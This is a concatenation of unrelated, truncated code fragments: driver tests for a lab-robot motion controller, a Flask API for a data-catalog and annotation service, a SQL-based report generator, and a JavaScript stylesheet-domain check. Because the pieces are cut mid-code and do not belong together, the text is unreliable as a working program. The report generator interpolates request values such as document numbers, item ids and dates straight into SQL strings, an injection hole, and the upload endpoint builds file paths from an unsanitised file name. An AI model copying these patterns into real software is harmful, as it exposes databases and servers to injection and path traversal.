['M907 A0 B0.42 C0.42 X0 Y0 Z0 G4 P0.005 G28.2 BC'], # home BC
['M400'],
['M907 A0 B0 C0 X0 Y0 Z0 G4 P0.005'], # dwell all axes after home
['M400'],
['M114.2'], # update the position
['M400'],
]
fuzzy_assert(result=command_log, expected=expected)
def test_steps_per_mm(smoothie, monkeypatch):
# Check that steps_per_mm dict gets loaded with defaults on start
assert smoothie.steps_per_mm == {}
smoothie._setup()
expected = {
**DEFAULT_GANTRY_STEPS_PER_MM,
'B': DEFAULT_PIPETTE_CONFIGS['stepsPerMM'],
'C': DEFAULT_PIPETTE_CONFIGS['stepsPerMM'],
}
assert smoothie.steps_per_mm == expected
smoothie.update_steps_per_mm({'Z': 450})
expected['Z'] = 450
assert smoothie.steps_per_mm == expected
def test_pipette_configs(smoothie, monkeypatch):
axis_value = 'home updated 175'
smoothie._send_command = Mock(return_value=axis_value)
res = smoothie.update_pipette_config('Z', {'home': 175})
expected_return = {'Z': {'home': 175}}
assert res == expected_return
def test_set_acceleration(smoothie, monkeypatch):
command_log = []
smoothie._setup()
smoothie.home()
smoothie.simulating = False
def write_with_log(command, ack, connection, timeout, tag=None):
command_log.append(command.strip())
return driver_3_0.SMOOTHIE_ACK
def _parse_position_response(arg):
return smoothie.position
monkeypatch.setattr(serial_communication, 'write_and_return',
write_with_log)
monkeypatch.setattr(
driver_3_0, '_parse_position_response', _parse_position_response)
smoothie.set_acceleration(
{'X': 1, 'Y': 2, 'Z': 3, 'A': 4, 'B': 5, 'C': 6})
smoothie.push_acceleration()
smoothie.pop_acceleration()
smoothie.set_acceleration(
{'X': 10, 'Y': 20, 'Z': 30, 'A': 40, 'B': 50, 'C': 60})
smoothie.pop_acceleration()
expected = [
['M204 S10000 A4 B5 C6 X1 Y2 Z3'],
['M400'],
['M204 S10000 A4 B5 C6 X1 Y2 Z3'],
['M400'],
['M204 S10000 A40 B50 C60 X10 Y20 Z30'],
['M400'],
['M204 S10000 A4 B5 C6 X1 Y2 Z3'],
['M400'],
]
fuzzy_assert(result=command_log, expected=expected)
def test_active_dwelling_current_push_pop(smoothie):
assert smoothie._active_current_settings != \
smoothie._dwelling_current_settings
old_active_currents = deepcopy(smoothie._active_current_settings)
old_dwelling_currents = deepcopy(smoothie._dwelling_current_settings)
smoothie.push_active_current()
smoothie.set_active_current({'X': 2.0, 'Y': 2.0, | |
res = es.load_data(index, type, doc, doc['doc_id'])
if not res:
logger.info('Fail to retrieve or load data to {}: project {}, kg_id {}, tag{}, index {}, type {}'
.format(index_version, project_name, kg_id, tag_name, index, type))
return
logger.info('Fail to retrieve or load data to {}: project {}, kg_id {}, tag{}, index {}, type {}'
.format(index_version, project_name, kg_id, tag_name, index, type))
return
except Exception as e:
logger.warning('Fail to remove annotation from {}: project {}, kg_id {}, tag {}'.format(
index_version, project_name, kg_id, tag_name
))
@staticmethod
def write_to_tag_file(project_name, tag_name):
file_path = os.path.join(_get_project_dir_path(project_name), 'entity_annotations/' + tag_name + '.csv')
tag_obj = data[project_name]['entities']
with codecs.open(file_path, 'w') as csvfile:
writer = csv.DictWriter(
csvfile, fieldnames=['tag_name', 'entity_name', 'kg_id', 'human_annotation'],
delimiter=',', quotechar='"', quoting=csv.QUOTE_NONNUMERIC)
writer.writeheader()
for entity_name_, entity_obj_ in tag_obj.iteritems():
for kg_id_, kg_obj_ in entity_obj_.iteritems():
for tag_name_, tag_obj_ in kg_obj_.iteritems():
if tag_name_ == tag_name and 'human_annotation' in tag_obj_:
writer.writerow(
{'tag_name': tag_name_, 'entity_name': entity_name_,
'kg_id': kg_id_, 'human_annotation': tag_obj_['human_annotation']})
@staticmethod
def load_from_tag_file(project_name):
dir_path = os.path.join(_get_project_dir_path(project_name), 'entity_annotations')
for file_name in os.listdir(dir_path):
name, ext = os.path.splitext(file_name)
if ext != '.csv':
continue
file_path = os.path.join(dir_path, file_name)
with codecs.open(file_path, 'r') as csvfile:
reader = csv.DictReader(
csvfile, fieldnames=['tag_name', 'entity_name', 'kg_id', 'human_annotation'],
delimiter=',', quotechar='"', quoting=csv.QUOTE_NONNUMERIC)
next(reader, None) # skip header
for row in reader:
_add_keys_to_dict(data[project_name]['entities'],
[row['entity_name'], row['kg_id'], row['tag_name']])
data[project_name]['entities'][row['entity_name']][row['kg_id']][row['tag_name']][
'human_annotation'] = row['human_annotation']
@api.route('/projects/<project_name>/tags/<tag_name>/annotations/<entity_name>/annotations/<kg_id>')
class TagAnnotationsForEntity(Resource):
@requires_auth
def delete(self, project_name, tag_name, entity_name, kg_id):
if project_name not in data:
return rest.not_found('Project: {} not found'.format(project_name))
if tag_name not in data[project_name]['master_config']['tags']:
return rest.not_found('Tag {} not found'.format(tag_name))
if entity_name not in data[project_name]['entities']:
return rest.not_found('Entity {} not found'.format(entity_name))
if kg_id not in data[project_name]['entities'][entity_name]:
return rest.not_found('kg_id {} not found'.format(kg_id))
if tag_name not in data[project_name]['entities'][entity_name][kg_id]:
return rest.not_found('kg_id {} not found'.format(kg_id))
if 'human_annotation' in data[project_name]['entities'][entity_name][kg_id][tag_name]:
del data[project_name]['entities'][entity_name][kg_id][tag_name]['human_annotation']
# write to file
TagAnnotationsForEntityType.write_to_tag_file(project_name, tag_name)
# remove from ES
TagAnnotationsForEntityType.es_remove_tag_annotation('full', project_name, kg_id, tag_name)
TagAnnotationsForEntityType.es_remove_tag_annotation('sample', project_name, kg_id, tag_name)
# commit to git
# git_helper.commit(files=[project_name + '/entity_annotations/' + tag_name + '.csv'],
# message='delete a tag annotation: project {}, entity {}, tag {}, kg_id {}'
# .format(project_name, entity_name, tag_name, kg_id))
return rest.deleted()
@requires_auth
def get(self, project_name, tag_name, entity_name, kg_id):
if project_name not in data:
return rest.not_found('Project: {} not found'.format(project_name))
if tag_name not in data[project_name]['master_config']['tags']:
return rest.not_found('Tag {} not found'.format(tag_name))
if entity_name not in data[project_name]['entities']:
return rest.not_found('Entity {} not found'.format(entity_name))
if kg_id not in data[project_name]['entities'][entity_name]:
return rest.not_found('kg_id {} not found'.format(kg_id))
if tag_name not in data[project_name]['entities'][entity_name][kg_id]:
return rest.not_found('kg_id {} not found'.format(kg_id))
# if 'human_annotation' not in data[project_name]['entities'][entity_name][kg_id][tag_name]:
# return rest.not_found('No human_annotation')
ret = data[project_name]['entities'][entity_name][kg_id][tag_name]
# return knowledge graph
parser = reqparse.RequestParser()
parser.add_argument('kg', required=False, type=str, help='knowledge graph')
args = parser.parse_args()
return_kg = True if args['kg'] is not None and \
args['kg'].lower() == 'true' else False
if return_kg:
ret['knowledge_graph'] = self.get_kg(project_name, kg_id, tag_name)
return ret
@staticmethod
def get_kg(project_name, kg_id, tag_name):
index_version = 'full'
try:
es = ES(config['es'][index_version + '_url'])
index = data[project_name]['master_config']['index'][index_version]
type = data[project_name]['master_config']['root_name']
hits = es.retrieve_doc(index, type, kg_id)
if hits:
doc = hits['hits']['hits'][0]['_source']
if 'knowledge_graph' not in doc:
return None
return doc['knowledge_graph']
return None
except Exception as e:
logger.warning('Fail to update annotation to: project {}, kg_id {}, tag {}'.format(
project_name, kg_id, tag_name
))
@api.route('/projects/<project_name>/data')
class Data(Resource):
@requires_auth
def post(self, project_name):
if project_name not in data:
return rest.not_found('project {} not found'.format(project_name))
parse = reqparse.RequestParser()
parse.add_argument('file_data', type=werkzeug.FileStorage, location='files')
parse.add_argument('file_name')
parse.add_argument('file_type')
parse.add_argument('sync')
parse.add_argument('log')
args = parse.parse_args()
if args['file_name'] is None:
return rest.bad_request('Invalid file_name')
file_name = args['file_name'].strip()
if len(file_name) == 0:
return rest.bad_request('Invalid file_name')
if args['file_data'] is None:
return rest.bad_request('Invalid file_data')
if args['file_type'] is None:
return rest.bad_request('Invalid file_type')
args['sync'] = False if args['sync'] is None or args['sync'].lower() != 'true' else True
args['log'] = True if args['log'] is None or args['log'].lower() != 'false' else False
# make root dir and save temp file
src_file_path = os.path.join(_get_project_dir_path(project_name), 'data', '{}.tmp'.format(file_name))
args['file_data'].save(src_file_path)
dest_dir_path = os.path.join(_get_project_dir_path(project_name), 'data', file_name)
if not os.path.exists(dest_dir_path):
os.mkdir(dest_dir_path)
if not args['sync']:
t = threading.Thread(target=Data._update_catalog_worker,
args=(project_name, file_name, args['file_type'], src_file_path, dest_dir_path,
args['log'],),
name='data_upload')
t.start()
data[project_name]['threads'].append(t)
return rest.accepted()
else:
Data._update_catalog_worker(project_name, file_name, args['file_type'],
src_file_path, dest_dir_path, args['log'])
return rest.created()
@staticmethod
def _update_catalog_worker(project_name, file_name, file_type, src_file_path, dest_dir_path, log_on=True):
def _write_log(content):
with data[project_name]['locks']['catalog_log']:
log_file.write('<#{}> {}: {}\n'.format(thread.get_ident(), file_name, content))
log_path = os.path.join(_get_project_dir_path(project_name),
'working_dir/catalog_error.log') if log_on else os.devnull
log_file = codecs.open(log_path, 'a')
_write_log('start updating catalog')
try:
# generate catalog
if file_type == 'json_lines':
suffix = os.path.splitext(file_name)[-1]
f = gzip.open(src_file_path, 'r') \
if suffix in ('.gz', '.gzip') else codecs.open(src_file_path, 'r')
for line in f:
if len(line.strip()) == 0:
continue
obj = json.loads(line)
# raw_content
if 'raw_content' not in obj:
obj['raw_content'] = ''
try:
obj['raw_content'] = unicode(obj['raw_content']).encode('utf-8')
except:
pass
# doc_id
obj['doc_id'] = unicode(obj.get('doc_id', obj.get('_id', ''))).encode('utf-8')
if not Data.is_valid_doc_id(obj['doc_id']):
if len(obj['doc_id']) > 0: # has doc_id but invalid
old_doc_id = obj['doc_id']
obj['doc_id'] = base64.b64encode(old_doc_id)
_write_log('base64 encoded doc_id from {} to {}'
.format(old_doc_id, obj['doc_id']))
if not Data.is_valid_doc_id(obj['doc_id']):
# generate doc_id
# if there's raw_content, generate id based on raw_content
# if not, use the whole object
if len(obj['raw_content']) != 0:
obj['doc_id'] = Data.generate_doc_id(obj['raw_content'])
else:
obj['doc_id'] = Data.generate_doc_id(json.dumps(obj, sort_keys=True))
_write_log('Generated doc_id for object: {}'.format(obj['doc_id']))
# url
if 'url' not in obj:
obj['url'] = '{}/{}'.format(Data.generate_tld(file_name), obj['doc_id'])
_write_log('Generated URL for object: {}'.format(obj['url']))
# timestamp_crawl
if 'timestamp_crawl' not in obj:
# obj['timestamp_crawl'] = time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime())
obj['timestamp_crawl'] = datetime.datetime.now().isoformat()
else:
try:
parsed_date = dateparser.parse(obj['timestamp_crawl'])
obj['timestamp_crawl'] = parsed_date.isoformat()
except:
_write_log('Can not parse timestamp_crawl: {}'.format(obj['doc_id']))
continue
# type
# this type will conflict with the attribute in logstash
if 'type' in obj:
obj['original_type'] = obj['type']
del obj['type']
# split raw_content and json
output_path_prefix = os.path.join(dest_dir_path, obj['doc_id'])
output_raw_content_path = output_path_prefix + '.html'
output_json_path = output_path_prefix + '.json'
with codecs.open(output_raw_content_path, 'w') as output:
output.write(obj['raw_content'])
with codecs.open(output_json_path, 'w') as output:
del obj['raw_content']
output.write(json.dumps(obj, indent=2))
# update data db
tld = obj.get('tld', Data.extract_tld(obj['url']))
with data[project_name]['locks']['data']:
data[project_name]['data'][tld] = data[project_name]['data'].get(tld, dict())
# if doc_id is already there, still overwrite it
exists_before = True if obj['doc_id'] in data[project_name]['data'][tld] else False
data[project_name]['data'][tld][obj['doc_id']] = {
'raw_content_path': output_raw_content_path,
'json_path': output_json_path,
'url': obj['url'],
'add_to_queue': False
}
# update status
if not exists_before:
with data[project_name]['locks']['status']:
data[project_name]['status']['total_docs'][tld] = \
data[project_name]['status']['total_docs'].get(tld, 0) + 1
# update data db & status file
set_catalog_dirty(project_name)
set_status_dirty(project_name)
f.close()
elif file_type == 'html':
pass
# notify action add data if needed
# Actions._add_data(project_name)
except Exception as e:
logger.exception('exception in _update_catalog_worker')
_write_log('Invalid file format')
finally:
# stop logging
_write_log('done')
log_file.close()
# remove temp file
os.remove(src_file_path)
@requires_auth
def get(self, project_name):
if project_name not in data:
return rest.not_found('project {} not found'.format(project_name))
parser = reqparse.RequestParser()
parser.add_argument('type', type=str)
args = parser.parse_args()
ret = dict()
log_path = os.path.join(_get_project_dir_path(project_name), 'working_dir/catalog_error.log')
# if args['type'] == 'has_error':
# ret['has_error'] = os.path.getsize(log_path) > 0
if args['type'] == 'error_log':
ret['error_log'] = list()
if os.path.exists(log_path):
with codecs.open(log_path, 'r') as f:
ret['error_log'] = tail_file(f, 200)
else:
with data[project_name]['locks']['status']:
for tld, num in data[project_name]['status']['total_docs'].iteritems():
ret[tld] = num
return ret
@requires_auth
def delete(self, project_name):
if project_name not in data:
return rest.not_found('project {} not found'.format(project_name))
input = request.get_json(force=True)
tld_list = input.get('tlds', list())
delete_from = input.get('from')
if delete_from is None:
return rest.bad_request('invalid attribute: from')
if delete_from == 'file':
t = threading.Thread(target=Data._delete_file_worker,
args=(project_name, tld_list,),
name='data_file_delete')
t.start()
data[project_name]['threads'].append(t)
elif delete_from == 'kg':
t = threading.Thread(target=Data._delete_es_worker,
args=(project_name, tld_list,),
name='data_kg_delete')
t.start()
data[project_name]['threads'].append(t)
return rest.accepted()
@staticmethod
def _delete_file_worker(project_name, tld_list):
for tld in tld_list:
# update status
with data[project_name]['locks']['status']:
if tld in data[project_name]['status']['desired_docs']:
del data[project_name]['status']['desired_docs'][tld]
if tld in data[project_name]['status']['added_docs']:
del data[project_name]['status']['added_docs'][tld]
if tld in data[project_name]['status']['total_docs']:
del data[project_name]['status']['total_docs'][tld]
set_status_dirty(project_name)
# update data
with data[project_name]['locks']['data']:
if tld in data[project_name]['data']:
# remove data file
for k, v in data[project_name]['data'][tld].iteritems():
try:
os.remove(v['raw_content_path'])
except:
pass
try:
os.remove(v['json_path'])
except:
pass
# remove from catalog
del data[project_name]['data'][tld]
set_catalog_dirty(project_name)
@staticmethod
def _delete_es_worker(project_name, tld_list):
query = '''
{{
"query": {{
"match": {{
"tld.raw": "{tld}"
}}
}}
}}
'''
es = ES(config['es']['sample_url'])
for tld in tld_list:
# delete from kg
try:
es.es.delete_by_query(index=project_name,
doc_type=data[project_name]['master_config']['root_name'],
body=query.format(tld=tld))
except:
logger.exception('error in _delete_es_worker')
# update status
with data[project_name]['locks']['status']:
if tld in data[project_name]['status']['added_docs']:
data[project_name]['status']['added_docs'][tld] = 0
data[project_name]['status']['desired_docs'][tld] = 0
set_status_dirty(project_name)
# update data
with data[project_name]['locks']['data']:
if tld in data[project_name]['data']:
for doc_id in data[project_name]['data'][tld].iterkeys():
data[project_name]['data'][tld][doc_id]['add_to_queue'] = False
set_catalog_dirty(project_name)
@staticmethod
def generate_tld(file_name):
return 'www.dig_{}.org'.format(re.sub(re_url, '_', file_name.lower()).strip())
@staticmethod
def generate_doc_id(content):
return hashlib.sha256(content).hexdigest().upper()
@staticmethod
def is_valid_doc_id(doc_id):
return re_doc_id.match(doc_id) and doc_id not in os_reserved_file_names
@staticmethod
def extract_tld(url):
return tldextract.extract(url).domain + '.' + tldextract.extract(url).suffix
@api.route('/projects/<project_name>/actions/project_config')
class ActionProjectConfig(Resource):
@requires_auth
def post(self, project_name): # frontend | |
<filename>sources/backend/mods/generate_report.py
# coding: utf-8
import os
import sys
import time
import json
import atexit
import datetime
import tempfile
import zipfile
import shutil
import base64
import zipimport
import traceback
from relatorio.templates.opendocument import Template
from xml.sax.saxutils import escape
class Invoice(dict):
pass
# @property
# def total(self):
# return sum(l['item']['amount'] for l in self['lines'])
class Shipment(Invoice):
doc_template = 'shipment_short.ods'
class Movement(Invoice):
doc_template = 'movement_short.ods'
class Arrival(Invoice):
doc_template = 'arrival_short.ods'
class Rest(Invoice):
doc_template = 'rest_short.ods'
class Balance(Invoice):
doc_template = 'balance.ods'
class Prod_movements(Invoice):
doc_template = 'products_movements.ods'
class REPORT:
def __init__(self, parent):
self.parent = parent
# _of = tempfile.NamedTemporaryFile(prefix='esc.', suffix=".print", delete=False)
self.temp_dir = tempfile.TemporaryDirectory(prefix='report_generator_')
self.temp_dir = self.temp_dir.name
# print(self.temp_dir)
# atexit.register(self._at_exit)
def at_exit(self):
if self.temp_dir and os.path.exists(self.temp_dir):
shutil.rmtree(self.temp_dir)
def generate_test(self, *args, **kwargs):
self.parent._print("*"*10, " generate_test ", "*"*10)
self.parent._print(args)
self.parent._print(kwargs)
self.parent._print("*"*10, " generate_test ", "*"*10)
# doc_type = 'arrival'
# kwargs['doc_type'] = doc_type
self.generate(*args, **kwargs)
answer = {"params": args,
"kwargs": kwargs, "timing": {"sql": 0, "process": 0},
}
return answer
def _generate_short_arrival(self, doc_number):
self.parent._print(doc_number)
data = {}
sql = f"""select
jah.n_number as doc_number,
jah.n_base as doc_base,
jah.n_executor as doc_employ,
rps.n_name as doc_suppl,
jah.n_pos_numbers as doc_positions,
jah.n_summ as doc_total,
jah.n_dt_invoice as doc_date,
rpc.n_name as rec_name,
rpr.c_name as pos_prod_name,
jab.n_product->'n_unit' as pos_unit,
jab.n_product->'n_amount' as pos_kol,
jab.n_product->'n_total_summ' as pos_total,
(jab.n_product->'n_total_summ')::int / (jab.n_product->'n_amount')::int as pos_price
-- ,jrb.n_product
from journals_arrivals_headers jah
join ref_partners rpc on rpc.n_id = jah.n_recipient
join ref_partners rps on rps.n_id = jah.n_supplier
join journals_arrivals_bodies jab ON jab.n_doc_id = jah.n_id and jab.n_deleted = false
join ref_products rpr on (rpr.c_id=(jab.n_product->'n_product')::bigint)
where jah.n_id = '{doc_number}'::bigint
order by jab.n_id"""
res = self.parent._request(sql)
if res:
data = {
'number': res[0][0],
'date': res[0][6],
'retailer': {
'name': res[0][3]
},
'customer': {
'name': res[0][7],
'storage': res[0][7],
},
'lines': [],
'total': self._gen_price(res[0][5]),
'total_text': '--'
}
for i, row in enumerate(res, 1):
r = {'item': {
'pos': i,
'name': row[8],
'unit': row[9],
'price': self._gen_price(row[12]),
'quantity': row[10],
'amount': self._gen_price(row[11])
}
}
data['lines'].append(r)
return data
def _generate_short_rest(self, doc_number):
self.parent._print(doc_number)
data = {}
sql = f"""select
jrh.n_number as doc_number,
jrh.n_base as doc_base,
jrh.n_executor as doc_employ,
jrh.n_pos_numbers as doc_positions,
jrh.n_summ as doc_total,
jrh.n_dt_invoice as doc_date,
rp.n_name as rec_name,
rpr.c_name as pos_prod_name,
jrb.n_product->'n_unit' as pos_unit,
jrb.n_product->'n_amount' as pos_kol,
jrb.n_product->'n_total_summ' as pos_total,
(jrb.n_product->'n_total_summ')::int / (jrb.n_product->'n_amount')::int as pos_price
-- ,jrb.n_product
from journals_rests_headers jrh
join ref_partners rp on rp.n_id = jrh.n_recipient
join journals_rests_bodies jrb ON jrb.n_doc_id = jrh.n_id and jrb.n_deleted = false
join ref_products rpr on (rpr.c_id=(jrb.n_product->'n_product')::bigint)
where jrh.n_id = '{doc_number}'::bigint
order by jrb.n_id
"""
res = self.parent._request(sql)
if res:
data = {
'number': res[0][0],
'date': res[0][5],
'customer': {
'storage': res[0][6],
},
'lines': [],
'total': self._gen_price(res[0][4]),
'total_text': '--'
}
for i, row in enumerate(res, 1):
r = {'item': {
'pos': i,
'name': row[7],
'unit': row[8],
'price': self._gen_price(row[11]),
'quantity': row[9],
'amount': self._gen_price(row[10])}
}
data['lines'].append(r)
return data
def _gen_price(self, price):
price = str(price)
return price[:-2] + ',' + price[-2:]
def _generate_balance(self):
sql = f"""select rp.c_name as name,
rp.c_nnt as t_code,
max(jpb.n_price) as price,
sum(jpb.n_quantity) as kol,
jpb.n_product_id as pr_id
from journals_products_balance jpb
join ref_products rp ON rp.c_id = jpb.n_product_id and (jpb.n_quantity != 0 and jpb.n_quantity is not null)
group by 1, 2, 5
order by 1 """
res = self.parent._request(sql)
if not res:
res = self.parent._request(sql_old)
if res:
data = {
'lines': [],
'total_amount': '',
'total_summ': '',
'total_pos': len(res)
}
for i, row in enumerate(res, 1):
p = row[2]*row[3]
r = {'item': {
'pos': i,
'name': row[0],
'code': row[1],
'price': f"""{str(row[2])[:-2]},{str(row[2])[-2:]}""",
'amount': row[3],
'summ': f"""{str(p)[:-2]},{str(p)[-2:]}"""
}
}
data['lines'].append(r)
ta = sum([ i['item']['amount'] for i in data['lines']])
ts = sum([ i[2]*i[3] for i in res])
data['total_amount'] = ta
data['total_summ'] = f"""{str(ts)[:-2]},{str(ts)[-2:]}"""
return data
def _generate_short_movement(self, doc_number):
self.parent._print(doc_number)
data = {}
sql_old = f"""select
jmh.n_number as doc_number,
jmh.n_base as doc_base,
jmh.n_executor as doc_employ,
rps.n_name as doc_suppl,
jmh.n_pos_numbers as doc_positions,
jmh.n_summ as doc_sell_total,
(jmh.n_summ::numeric / (1 + (jmb.n_product->'n_charge')::numeric))::int as doc_prih_total,
jmh.n_dt_invoice as doc_date,
rpc.n_name as doc_rec_name,
j1.name as pos_prod_name,
jmb.n_product->'n_unit' as pos_unit,
jmb.n_product->'n_amount' as pos_kol,
case
when (jmb.n_product->'n_amount')::int > 0
then (jmb.n_product->'n_total_summ')::int /(jmb.n_product->'n_amount')::int
else 0
end as pos_sale_price,
jmb.n_product->'n_total_summ' as pos_sale_total,
jpb.n_consignment as seria,
'' as goden,
case
when (jmb.n_product->'n_amount')::int > 0
then ((jmb.n_product->'n_total_summ')::numeric / (1 + (jmb.n_product->'n_charge')::numeric))::int / (jmb.n_product->'n_amount')::int
else 0
end as pos_prih_price,
((jmb.n_product->'n_total_summ')::numeric / (1 + (jmb.n_product->'n_charge')::numeric))::int as pos_prih_total,
rpu.n_name as u_name
from journals_movements_headers jmh
join ref_partners rpc on rpc.n_id = jmh.n_recipient
join ref_partners rps on rps.n_id = jmh.n_supplier
join journals_movements_bodies jmb ON jmb.n_doc_id = jmh.n_id and jmb.n_deleted = false
join journals_products_balance jpb on jpb.n_id = (jmb.n_product->'n_balance_id')::bigint
join (select pb.n_product_id, rp.c_name as name, pb.n_id as id, pb.n_quantity as stock
from journals_products_balance pb
join ref_products rp on (rp.c_id=pb.n_product_id)) as j1
on (j1.id = (jmb.n_product->'n_balance_id')::bigint)
join ref_partners rpu on rpu.n_id = rpc.n_parent_id
where jmh.n_id = '{doc_number}'::bigint
order by pos_prod_name --jmb.n_id"""
sql = f"""select
jmh.n_number as doc_number,
jmh.n_base as doc_base,
jmh.n_executor as doc_employ,
rps.n_name as doc_suppl,
jmh.n_pos_numbers as doc_positions,
jmh.n_summ as doc_sell_total,
(jmh.n_summ::numeric / (1 + (jmb.n_product->'n_charge')::numeric))::int as doc_prih_total,
jmh.n_dt_invoice as doc_date,
rpc.n_name as doc_rec_name,
j1.name as pos_prod_name,
jmb.n_product->'n_unit' as pos_unit,
jmb.n_product->'n_amount' as pos_kol,
case
when (jmb.n_product->'n_amount')::int > 0
then (jmb.n_product->'n_total_summ')::int /(jmb.n_product->'n_amount')::int
else 0
end as pos_sale_price,
jmb.n_product->'n_total_summ' as pos_sale_total,
'' as seria, --jpb.n_consignment as seria,
'' as goden,
case
when (jmb.n_product->'n_amount')::int > 0
then ((jmb.n_product->'n_total_summ')::numeric / (1 + (jmb.n_product->'n_charge')::numeric))::int / (jmb.n_product->'n_amount')::int
else 0
end as pos_prih_price,
((jmb.n_product->'n_total_summ')::numeric / (1 + (jmb.n_product->'n_charge')::numeric))::int as pos_prih_total,
rpu.n_name as u_name
from journals_movements_headers jmh
join ref_partners rpc on rpc.n_id = jmh.n_recipient
join ref_partners rps on rps.n_id = jmh.n_supplier
join journals_movements_bodies jmb ON jmb.n_doc_id = jmh.n_id and jmb.n_deleted = false
-- join journals_products_balance jpb on jpb.n_id = (jmb.n_product->'n_balance_id')::bigint
join (select d1.n_product_id as n_product_id, rp.c_name as name, d1.stock as stock
from (select pb.n_product_id as n_product_id, max(pb.n_quantity) as stock
from journals_products_balance pb
group by pb.n_product_id) as d1
join ref_products rp on (rp.c_id=d1.n_product_id)) as j1
on (j1.n_product_id = (jmb.n_product->'n_balance_id')::bigint)
join ref_partners rpu on rpu.n_id = rpc.n_parent_id
where jmh.n_id = '{doc_number}'::bigint
order by pos_prod_name --jmb.n_id"""
res = self.parent._request(sql)
if not res:
print(sql_old)
res = self.parent._request(sql_old)
else:
print(sql)
if res:
data = {
'number': res[0][0],
'date': res[0][7],
'base': res[0][1],
'retailer': {
'name': res[0][3]
},
'customer': {
'name': res[0][18],
'storage': res[0][8],
},
'lines': [],
'arrival_total': self._gen_price(res[0][6]),
'sell_total': self._gen_price(res[0][5]),
'sell_total_text': '--'
}
for i, row in enumerate(res, 1):
r = {'item': {
'pos': i,
'consignment': row[14],
'name': row[9],
'unit': row[10],
'expired': row[15],
'arrival_price': self._gen_price(row[16]),
'arrival_amount': self._gen_price(row[17]),
'sell_price': self._gen_price(row[12]),
'sell_amount': self._gen_price(row[13]),
'quantity': row[11],
}
}
data['lines'].append(r)
return data
def _generate_short_shipment(self, doc_number):
self.parent._print(doc_number)
data = {}
sql = f"""select
jsh.n_number as doc_number,
jsh.n_base as doc_base,
jsh.n_executor as doc_employ,
rps.n_name as doc_suppl,
jsh.n_pos_numbers as doc_positions,
jsh.n_summ as doc_sell_total,
(jsh.n_summ::numeric / (1 + (jsb.n_product->'n_charge')::numeric))::int as doc_prih_total,
jsh.n_dt_invoice as doc_date,
rpc.n_name as doc_rec_name,
j1.name as pos_prod_name,
jsb.n_product->'n_unit' as pos_unit,
jsb.n_product->'n_amount' as pos_kol,
(jsb.n_product->'n_total_summ')::int / (jsb.n_product->'n_amount')::int as pos_sale_price,
jsb.n_product->'n_total_summ' as pos_sale_total,
jpb.n_consignment as seria,
'' as goden,
((jsb.n_product->'n_total_summ')::numeric / (1 + (jsb.n_product->'n_charge')::numeric))::int / (jsb.n_product->'n_amount')::int as pos_prih_price,
((jsb.n_product->'n_total_summ')::numeric / (1 + (jsb.n_product->'n_charge')::numeric))::int as pos_prih_total
from journals_shipments_headers jsh
join ref_partners rpc on rpc.n_id = jsh.n_recipient
join ref_partners rps on rps.n_id = jsh.n_supplier
join journals_shipments_bodies jsb ON jsb.n_doc_id = jsh.n_id and jsb.n_deleted = false
join journals_products_balance jpb on jpb.n_id = (jsb.n_product->'n_balance_id')::bigint
join (select pb.n_product_id, rp.c_name as name, pb.n_id as id, pb.n_quantity as stock
from journals_products_balance pb
join ref_products rp on (rp.c_id=pb.n_product_id)) as j1
on (j1.id = (jsb.n_product->'n_balance_id')::bigint)
where jsh.n_id = '{doc_number}'::bigint
order by jsb.n_id"""
res = self.parent._request(sql)
if res:
data = {
'number': res[0][0],
'date': res[0][7],
'base': res[0][1],
'retailer': {
'name': res[0][3]
},
'customer': {
'name': res[0][8],
'storage': res[0][8],
},
'lines': [],
'arrival_total': self._gen_price(res[0][6]),
'sell_total': self._gen_price(res[0][5]),
'sell_total_text': '--'
}
for i, row in enumerate(res, 1):
r = {'item': {
'pos': i,
'consignment': row[14],
'name': row[9],
'unit': row[10],
'expired': row[15],
'arrival_price': self._gen_price(row[16]),
'arrival_amount': self._gen_price(row[17]),
'sell_price': self._gen_price(row[12]),
'sell_amount': self._gen_price(row[13]),
'quantity': row[11],
}
}
data['lines'].append(r)
return data
def product_movement(self, *args, **kwargs):
self.parent._print("*"*10, " product_movement ", "*"*10)
self.parent._print(args)
self.parent._print(kwargs)
self.parent._print("*"*10, " product_movement ", "*"*10)
doc_type = 'products_movements'
date1 = kwargs.get('date1')
date2 = kwargs.get('date2')
arr_fg = kwargs.get('arr_fg')
dep_fg = kwargs.get('dep_fg')
item_id = kwargs.get('item_id')
answer = {"params": args,
"kwargs": kwargs,
}
d_data = []
a_data = []
sql_move = f"""select
jmh.n_number as doc_number,
jmh.n_dt_invoice as doc_date,
'' as suppl,
rp.n_name as point,
0,
(jmb.n_product->'n_amount')::text::numeric as amount,
(select c_name from ref_products where c_id = {item_id})
from journals_movements_bodies jmb
join journals_movements_headers jmh on jmb.n_doc_id = jmh.n_id
join ref_partners rp ON rp.n_id = jmh.n_recipient
where (jmb.n_product->'n_balance_id')::text in (select jpb.n_id::text
from journals_products_balance jpb
where jpb.n_product_id = {item_id})
and jmb.n_deleted=false
and jmh.n_dt_invoice >= '{date1}'::date
and jmh.n_dt_invoice <= '{date2}'::date
"""
sql_arr = f"""select
jah.n_number as doc_number,
jah.n_dt_invoice as doc_date,
rp.n_name as suppl,
'' as point,
(jab.n_product->'n_amount')::text::numeric as amount,
0,
(select c_name from ref_products where c_id = {item_id})
from journals_arrivals_bodies jab
join journals_arrivals_headers jah on jab.n_doc_id = jah.n_id
join ref_partners rp ON rp.n_id = jah.n_supplier
where (jab.n_product->'n_product')::text = '{item_id}'
and jab.n_deleted=false
and jah.n_dt_invoice >= '{date1}'::date
and jah.n_dt_invoice <= '{date2}'::date
"""
sqls = []
if not arr_fg and not dep_fg:
return answer
if arr_fg:
sqls.append(sql_arr)
if dep_fg:
sqls.append(sql_move)
sqls = '\nunion all\n'.join(sqls)
sql = f"""select * from (
{sqls}
) as aa
order by doc_date asc, doc_number
"""
# print(sql)
a_data = self.parent._request(sql)
if a_data:
data = {
'lines': [],
'tovar': a_data[0][6],
'date1': datetime.datetime.strptime(date1, '%Y-%m-%d %H:%M:%S').strftime('%d-%m-%y'),
'date2': datetime.datetime.strptime(date2, '%Y-%m-%d %H:%M:%S').strftime('%d-%m-%y'),
'arr_total': 0,
'dep_total': 0,
}
for i, row in enumerate(a_data, 1):
d = datetime.datetime.strptime(row[1], '%Y-%m-%d')
r = {'item': {
'doc': row[0],
'date': d.strftime('%d-%m-%y'),
'suppl': row[2],
'recip': | |
= getHostname(element);
if (elementDomain !== docDomain) {
offending.push(element);
if (offendingDomains.indexOf(elementDomain) === -1) {
offendingDomains.push(elementDomain);
score += 10;
}
}
}
cssFilesInHead.forEach(function (style) {
checkDomain(style)
});
